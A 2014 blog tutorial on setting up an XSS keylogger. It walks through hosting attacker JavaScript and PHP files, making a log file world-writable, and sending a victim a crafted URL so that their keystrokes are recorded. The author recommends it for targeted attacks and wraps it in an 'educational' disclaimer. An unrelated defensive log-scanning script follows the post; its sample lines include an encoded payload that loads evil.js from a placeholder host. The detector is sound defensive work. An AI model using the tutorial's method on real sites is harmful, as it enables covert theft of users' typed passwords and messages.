
Tuesday, January 7, 2014

XSS Keylogger | Keylog from XSS

Today I am going to show you how to keylog someone using just XSS. Keep in mind that you need an XSS-vulnerable target and XSS knowledge in order to perform this kind of "attack".

I have explained what XSS is in one of my previous tutorials, so I am not going to explain now how to check a website for XSS vulnerabilities etc.
Make sure to check it if something about XSS is unclear to you.

Note: This is for educational purposes only!

First we need web hosting, because we are going to upload our evil PHP and JS files. (You will find the download link at the end of the thread.)

I suggest you use 1freehosting, which in my opinion is one of the best free hosts out there.

Now you have to edit evil.js so that the URL inside the file is the URL of the PHP logger script. The JavaScript file is what we will insert in the evil URL to keylog the victim; it then sends the keystrokes to the PHP script on our host, which writes them to our gift.txt file.

Right Click > Edit and this will appear:


You have to change the yellow part to the URL of your PHP logger script and then save the file.

Now we need to edit the evil.php file to decide where the keylogs will be written; in this case I will use gift.txt.

Right Click > Edit and you will see this:


You can rename the yellow part which is gift.txt to anything you want.

OK, now upload the files you just downloaded to your web hosting. Keep in mind that all the files need to be in the same folder.

Create a new file on your web hosting named gift.txt (in my case), which will be the destination where the keylogs end up.

NOTE: Don't forget to set the permissions of all the files (evil.js, evil.php, gift.txt) to 777! (You can do it easily in FileZilla just by right-clicking on the file, then File permissions, and setting it to 777 like in the image below.)


OK, now we have set up everything we need to perform this attack. All we have to do now is create our evil payload and send it to the victim.


This is how it looks after I have inserted my XSS payload on the website. From this moment the victim is keylogged!


Now that we are keylogging the victim (in this case the victim is me, as I have opened the evil URL to show you how it looks), let's try to write something to see if we receive anything in our gift.txt file, which we have put on our hosting. For example, let's write "I LOVE HH" in the search box like in the image:


Now let's check gift.txt


And here it is! Every key is recorded perfectly in our gift.txt file!


File passcode:gaara

This is recommended for targeted attacks, because if you spread it en masse the logs might end up in a mess. The keylogging continues for as long as the victim does not leave the page; after that it won't work anymore.
Hopefully you have learnt something new from this tutorial which will help you understand better how XSS works.
If you need help, feel free to PM me or leave a comment.

Greets,
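
Seen from the defender's side, the evil URL described above shows up in the vulnerable site's access log as a request whose query string carries a script tag loaded from another host. The following detection sketch is an added example, not part of the original post or its download; `SITE_HOST`, the `host.invalid` placeholder and the log lines are constructed assumptions.

```javascript
// Added defensive example: flag requests whose query string reflects a <script src> from another host.
const SITE_HOST = "shop.example"; // assumption: hostname of the site being defended
// Decode repeatedly so double-encoded markup (%253Cscript) is still seen.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, " ")); }
    catch { break; } // malformed escape: keep what was decoded so far
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Return the off-site hosts referenced by script tags in a request target.
function externalScriptHosts(requestTarget) {
  const q = requestTarget.indexOf("?");
  if (q === -1) return [];
  const decoded = fullyDecode(requestTarget.slice(q + 1));
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?\s*(?:https?:)?\/\/([^\/"'\s>]+)/gi;
  const hosts = [];
  for (const m of decoded.matchAll(re)) {
    const host = m[1].toLowerCase();
    if (host !== SITE_HOST) hosts.push(host);
  }
  return hosts;
}

// Scan combined-format access log lines; one finding per suspicious request.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = line.match(/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
    if (!m) continue;
    const hosts = externalScriptHosts(m[2]);
    if (hosts.length) findings.push({ client: m[1], hosts });
  }
  return findings;
}

// Constructed sample log lines (documentation addresses, placeholder hosts).
const SAMPLE_LOG = [
  '203.0.113.7 - - [07/Jan/2014:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '203.0.113.9 - - [07/Jan/2014:10:00:05 +0000] "GET /search?q=%3Cscript%20src%3D%22http%3A%2F%2Fhost.invalid%2Fevil.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 640',
  '203.0.113.9 - - [07/Jan/2014:10:00:09 +0000] "GET /search?q=%253Cscript+src%253D%2F%2Fhost.invalid%2Fevil.js%253E HTTP/1.1" 200 640',
  '203.0.113.4 - - [07/Jan/2014:10:00:12 +0000] "GET /search?q=%3Cscript%20src%3D%22http%3A%2F%2Fshop.example%2Fapp.js%22%3E HTTP/1.1" 200 640',
];
console.log(scanAccessLog(SAMPLE_LOG));
```

A hit only says that such a URL was requested; whether the page actually reflected the markup unescaped still has to be checked against the application's output encoding.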





